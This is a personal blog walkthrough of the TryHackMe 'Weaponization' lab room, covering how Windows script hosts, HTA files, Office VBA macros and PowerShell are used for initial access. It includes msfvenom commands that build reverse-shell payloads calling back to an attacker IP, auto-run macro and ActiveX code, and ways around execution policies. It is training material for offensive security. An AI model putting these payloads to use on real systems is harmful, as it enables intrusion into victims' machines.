Penetrating Networks

0 %
Navid Fazle Rabbi
Sr. Security Researcher
Offensive Security Research
bKash Ltd.
Research Interest
  • 🔒 Web & Mobile AppSec
  • 💥 Side-Channel Analysis
  • 🤖 AI Attacks & AI Security
  • 🔗 Blockchain & Web3 Security
  • 🌐 Browser Security
  • 💻 Source Code Analysis
  • 🔐 Real-world Cryptograpy
  • 💣 Exploit Development
  • 🔄 Reverse Engineering
  • 🌐 IoT Security

TryHackMe | Weaponization

September 17, 2022

In this blog, I will try to show and explain the TryHackMe room Weaponization in a short way. Weaponization is the process of putting an exploit and a backdoor into a payload that can be sent.

Weaponization is a TryHackMe Room that tries to explain how the techniques of Weaponization work. Lockheed Martin’s Cyber Kill Chain has a key point called “Weaponization.”

What is Weaponization?

The second step in the Cyber Kill Chain model is weaponization. During this stage, the attacker creates and develops their own malicious code using deliverable payloads like Word documents, PDFs, etc. The goal of the weaponization stage is to use the malicious tool to exploit the target machine and get initial access.

The image shows an example of weaponization, in which a malicious payload is sent through a custom-made PDF or Microsoft Office document. The custom payload is set up so that it can connect back to the red team infrastructure’s command and control environment.

This room is only about using weaponization techniques to break into Windows systems. Since Windows is the most popular OS and is used every day, individuals must learn how to weaponize for Windows OS.

This room is all about scripting techniques that are popular and work well, such as:

  • Windows Script Host (WSH)
  • HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

Windows Scripting Host (WSH)

Windows scripting host is a built-in tool for managing and automating tasks in the operating system. It does this by running batch (.bat) files.

csript.exe and wscript.exe are used to run VBScript (Microsoft Visual Basic Scripts) files, including .vbs and .vbe. The only difference between wscript.exe and cscript.exe is that one is marked as a Windows application and the other as a console application.

It is essential to understand that the VBScript engine on a Windows operating system runs and executes applications with the same level of access and permission as a regular user. This makes it useful for the red teamers.

Your First VBScript Code

Open Notepad/Your favorite code editor > Write the following code > Save your file as .vbs

Dim message  # Declaring Message Variable
message = "Hello World!!"  # Assigning value to the Variable
MsgBox message  #Using MsgBox function to show the content of the variable

Use wscript/cscript to execute the file.

Now, let’s use VBScript to run files that are executable. The following VBS code calls up the Windows calculator. This shows that .exe files can be run using the Windows native engine (WSH).

WScript.CreateObject("Wscript.Shell").Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True 

So what’s going on here? We use the CreateObject function of the WScript Library to make an object. This starts a shell that runs the command we want, which in this case opens the calculator.

If the VBS files are on a blacklist, we can change the file’s name to .txt and run it with script.

We can specify, /e:VBScript to use VBScript engine to run the txt file as vbs.

HTML Application (HTA)

“HTML Application” is what HTA is short for. It lets you make a file that can be downloaded and that has all the information about how it is shown and rendered. HTML Applications, which are also called HTAs, are dynamic HTML pages with JScript and VBScript code. HTA files are run with the mshta tool from the LOLBINS (Living-of-the-land Binaries) project. It can be run on its own, or Internet Explorer can do it for you.

HTA will be described in 3 ways –

  • Manual
  • Using msfvenom
  • Using Metasploit (persistence enabled)
Manual

In this example, we will be creating a .hta file. We will then broadcast it so that the victim downloads it and executes the file.

We will use an ActiveXObject in our payload as proof of concept to execute cmd.exe.

ActiveX controls are software components that Microsoft made so that applications can do certain things, like show a calendar or play a video. An ActiveX control is a small program that other programs can use to do the same thing without having to do as much work on their own. Most of the time, these controls have been built as plugins to improve different kinds of Internet Explorer (IE) web applications.

Consider the following HTML code. In this HTML Code, we are writing a script within the tag where a variable ‘c’ is declared with cmd.exe. Then an ActiveXObject is called to start the WScript Shell, so that it can run our designated command in ‘c’.

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Save this in .hta extension. Then use your machine to serve this.

Now, we can see that we can access the .hta. Downloading the .hta file, we get this,

Now, lets run the file –

Once we press Run, the payload .hta gets executed, and then it will invoke the cmd.exe. The figure shows that we have successfully executed the cmd.exe.

So what’s going on here? The following image shows everything in a nutshell –

Using msfvenom

Let’s first write down what we plan to do.

  • Using msfvenom to make a payload that listens for a connection on the 443 Port. Waiting for a connection from the Victim Host in the reverse direction. The payload is sent from the attacker’s PC through a web server on any port that can be used.
  • When the victim goes to the URL for the malicious payload, the reverse shell connects to the attacker’s 443 port.

Generating payload using msfvenom,

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.17.41.165 LPORT=443 -f hta-psh -o dl28.hta
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of hta-psh file: 7766 bytes
Saved as: dl28.hta

With msfvenom, we give it a payload (windows/x64/shell reverse tcp), a listening host (the attacker’s machine), and a listening port (the attacker’s machine). We stated that the payload should be in hta-psh format, and the result will be dl28.hta.

Now, listening to the port 443 using netcat.

From, the Windows machine we find the following,

We can see that our payload is being delivered. Now, trying to get the app to download and run –

We are able to make the reverse connection work. Now that we’re in Windows, we can run any command line commands.

Using Metasploit

We will use the exploit exploit/windows/misc/hta server in Metasploit. This exploit requires you to choose and set information like LHOST, LPORT, SRVHOST, and Payload. Let’s assign the information and run the exploit.

After going to the URL from the victim host, we get the following message in Metasploit, which tells us we’re inside the victim host.

Visual Basic for Application

VBA stands for “Visual Basic for Applications.” It is a programming language made by Microsoft and used in Microsoft programs like Word, Excel, PowerPoint, etc. Macros are Microsoft Office programs that have code written in a programming language called Visual Basic for Applications that is built right into them. It is used to make custom functions that automate manual tasks to make them go faster. Accessing the Windows Application Programming Interface (API) and other low-level functions is one of the things you can do with VBA.

In this task, we will learn how to make macros that do malicious things. First, we would learn how to make a macro, and then, in the end, we would learn how to use them maliciously.

First, lets see how to create macros –

From View>Macros, we get the Macros options

Now, assign a Macro name, and assign for which Document Macro needs to be created, from the Macros in dropdown. After selecting, hit create –

After hitting create, Microsoft Visual Basic for Application appears and gives us a space to write our VBA Code.

As initially, we will be learning how to write a simple VBA code, lets focus on writing a Hello World prompt.

Now, after running this code we get the following –

We have written our first piece of code. Now, let’s set up the VBA code to run automatically when the document opens. We can use functions like AutoOpen and Document_Open that come with the program. Keep in mind that we need to say the name of the function that needs to be run when the document opens. In our case, this is the DL28 function.

It’s important to remember that in order for the macro to work, we need to save it in a format that allows macros, like .doc or .docm. Now, let’s save the file as a Word 97-2003 Template with the Macro turned on by going to File > Save Document1 > Save as type > Word 97-2003 Document and then saving. Let’s close the document after we’ve saved. Then, when we open it from where we saved it, we see the following –

Microsoft Word shows a security message that says Macros have been turned off and gives us the option to turn them back on. Let’s turn it on and move on to see what the result is.

We now know that you can open the programs by opening the documents. Let’s think of a way to use VBA codes to run exe files. In this PoC, we will be trying to open the calculator.

Lets change the codes within the function DL28.

What is happening here?

Sub DL28()
	Dim payload As String   #Declaring payload variable as a string
	payload = "calc.exe"   #Assigning the payload to our desired value
	CreateObject("Wscript.Shell").Run payload,0   #Invoking Windows Scripting Host (WSH) object and run the payload
End Sub

Now, saving and running the document like the previous process,

We can see that, it gets executed.

Let us use msfvenom to generate payload and Metasploit to get reverse shell using this VBA Script.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.17.41.165 LPORT=443 -f vba
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of vba file: 2698 bytes

We are creating a meterpreter payload, where we have assigned our LHOST and LPORT. After trying to generate the payload, we get this –

This is created to work for excel sheets, to make it work for document files, change the Workbook_Open to Document_Open.

Now copy the output and save it into the macro editor of the MS word document, as showed previously. Serve an HTTP server to broadcast the file.

Let start Metasploit and open a listener.

We can get a reverse shell to the victim’s machine after opening the listener and the document on the victim’s host.

Powershell

PowerShell is an object-oriented programming language that runs from the Dynamic Language Runtime (DLR) in.NET, with a few exceptions for legacy uses. Red team members use PowerShell to do many things, like initial access, system enumerations, and many more. First, let’s make a simple PowerShell script that prints “Hello World!! ” like this –

Write the following in a notepad/code editor and save it in .ps1 extension –

Write-Output "Hello World!!"

Now, lets execute this with powershell –

Usually, while running with command line, we may face the following issue –

It’s because PowerShell’s execution policy is a security feature that stops malicious scripts from running. Microsoft doesn’t let .ps1 PowerShell scripts run by default because it’s safer that way. The PowerShell execution policy is set to “Restricted,” which means that it lets you run individual commands but not scripts.

We can see that, by default it is set to restricted. We can also easily change the PowerShell execution policy by running the following –

Microsoft gives ways to get around this limit. One of these ways is to give a PowerShell command an argument option to change it to the setting you want. For example, we can change it to “bypass policy,” which means that nothing is blocked or limited. This is helpful because it lets us run our own PowerShell scripts, which is useful. Now reverting back to restricted and trying to bypass the policy we get the following –

Delivery Techniques

One of the most important parts of getting initial access is the delivery method. To get the content to work, they have to look professional, real, and convincing to the victim. Some common methods will be –

  • Email Delivery
  • Web Delivery
  • USB Delivery

Practice Arena

The problem depicts to start a reverse shell to get a connection to the Remote Server and retrieve Flag.

After spinning on the server, we get the following webpage.

The payloads can be uploaded as VBS, DOC, or PS1 files through the web application. Also, if we give the web application a malicious HTA link, it will go to the link.

Now, let us use Metasploit and provide an URL for the user to browse and give us a reverse shell.

Providing the link to the server,

We have been able to get in. We were able to find the flag after a few clues.

Posted in CTF, Red TeamTags: